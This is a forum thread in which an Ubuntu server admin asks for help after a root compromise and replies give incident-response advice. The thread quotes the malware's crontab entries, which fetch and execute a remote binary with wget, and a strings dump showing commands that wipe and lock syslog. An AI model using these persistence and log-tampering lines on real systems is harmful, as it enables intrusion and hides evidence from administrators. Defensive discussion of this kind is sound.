Thread: Server sending cron botnet ssh commands

Beans

Server sending cron botnet ssh commands

I got a disconcerting from my sys admin this morning that someone has been running a botnet off of my Ubuntu installation last night for an hour. I checked the /var/log/auth.log and see a lot of...

Feb 26 04:20:01 xxxx CRON[2640]: pam_unix(cron:session): session opened for user root by (uid=0)
    Feb 26 04:20:02 xxxx CRON[2640]: pam_unix(cron:session): session closed for user root
    Feb 26 04:21:01 xxxx CRON[2653]: pam_unix(cron:session): session opened for user root by (uid=0)
    Feb 26 04:21:02 xxxx CRON[2653]: pam_unix(cron:session): session closed for user root
    Feb 26 04:22:01 xxxx CRON[2667]: pam_unix(cron:session): session opened for user root by (uid=0)

The root crontab has the following added to it...
    * * * * * /root/.rnd_ >/dev/null 2>&1
    @weekly wget http://xxxxxxxxxx.bot -O /root/.rnd_;chmod +x /root/.rnd_;/root/.rnd_ >/dev/null 2>&1

At the times that the network admin says my server has been flooding traffic.

I've set the following in sshd_config:
    PermitRootLogin no
    PubkeyAuthentication yes
    PasswordAuthentication no

I've deleted the root account password (fairly sure I never enabled it):
    sudo passwd -dl root

I've installed denyhosts

Also rather disconcerting, the permissions of my syslog have changed and the file is empty...
    xxx@xxxx:~$ ls -lrth /var/log/syslog
    ---------- 1 root root 0 Feb 23 20:08 /var/log/syslog

This is a server used by a group of about 10 people or so, with very limited sudo access. What other steps should I be taking?

I'm very close to considering backing up and reinstalling, I don't know how deep this compromise has gone, especially since syslog is empty.

Thanks.
    Last edited by sandyd; February 26th, 2013 at 08:16 PM. Reason: edited link. link was valid though

Beans
    Hidden!

Re: Server sending cron botnet ssh commands

Quote Originally Posted by jzambon View Post
    Also rather disconcerting, the permissions of my syslog have changed and the file is empty...
    Well that's just a side effect of what both the "a" and "b" binaries do. From running 'strings -an4' on "b":
    Code:
    rm -rf /var/log/syslog;touch /var/log/syslog;chmod 0000 /var/log/syslog;chattr +isa /var/log/syslog;
    /tmp/cron
    touch /tmp/cron
    %s%s
     >/dev/null 2>&1
    @weekly wget -q http://xxxxxxxxxx.bot -O /tmp/.a;chmod +x /tmp/.a;sh /tmp/.a >/dev/null 2>&1
    crontab /tmp/cron;rm -rf /tmp/cron
    This is a server used by a group of about 10 people or so, with very limited sudo access. What other steps should I be taking?
    While you can't be faulted for your after-the-fact reflexes (CERT Intruder Detection Checklist) your first step should have been to 0) gather nfo (users, processes, network, file system integrity), 1) mitigate the situation by raising the firewall and stopping any service that isn't vital for accessing / managing the machine (at, cron, web server, database, etc, etc) basically every networked service except SSH and 2) informing users about this compromise advising them to change all pass phrases / passwords used on or from this machine.

I'm very close to considering backing up and reinstalling, I don't know how deep this compromise has gone, especially since syslog is empty.
    A perp managed to run processes as root. This means you're dealing with a root compromise and there is no "easy way out". Installing from scratch will only be effective if you harden the machine properly as you rebuild it. This means you start with a machine from the ground up, no web server, no database, not exposing any networked services while you secure the basis. In case you think of restoring a backup: consider all your pass phrases and passwords siphoned off the system and all your backups, configuration and applications tainted unless you are able to verify integrity independently, autonomously. Login records, processes, network data, foreign objects in users homes or temporary directories or the docment root, users shell history, (any remaining) system and daemon log files should be saved off-site before you proceed because whichever approach you choose it is vital you learn how the perp got in.
    Last edited by matt_symes; February 26th, 2013 at 07:49 PM. Reason: Remove link to botnet

Beans
    Hidden!
    Distro
    Ubuntu Development Release

Re: Server sending cron botnet ssh commands

You have been infected with Linux/Tsunami

see http://www.virusradar.com/en/Linux_T....B/description

Also, please do not post links to botnets, even in the security forums.

Thanks
    Ubuntu Forums Moderation Staff
    Don't waste your energy trying to change opinions ... Do your thing, and don't care if they like it.

Beans
    Hidden!

//Soz, OT

Quote Originally Posted by sandyd View Post
    You have been infected with Linux/Tsunami
    With all due respect please be more clear. What should the OP do about that and how?
    Last edited by unspawn; February 27th, 2013 at 04:22 AM. Reason: //Invite discussion, be constructive.